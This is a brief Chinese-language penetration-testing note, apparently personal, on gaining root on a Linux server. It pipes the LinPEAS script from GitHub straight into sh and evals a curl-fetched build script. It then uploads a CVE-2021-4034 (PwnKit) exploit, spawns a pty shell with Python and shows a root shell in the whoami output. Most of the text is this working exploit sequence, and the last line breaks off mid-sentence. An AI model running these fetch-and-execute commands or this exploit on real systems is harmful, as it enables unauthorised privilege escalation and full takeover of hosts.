LinPEAS - Linux Privilege Escalation Awesome Script
linxu 提权脚本
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
直接使用:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
黄色的要特别注意,扫描到一个,
CVEs Check
Vulnerable to CVE-2021-4034
文章提到这个:
https://github.com/Rvn0xsy/CVE-2021-4034
但我用这个代码:
https://github.com/berdav/CVE-2021-4034
没法复现。。。。
gcc: error trying to exec 'cc1': execvp: No such file or directory 错误
发现是服务器问题,编译链不完整。只好找台机器本地编译,
用下面脚本本地编译: eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
然后上传到目标机器
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.2$ ./cve-2021-4034
./cve-2021-4034
sh-4.2# whoami
whoami
root
成功!!!
应该是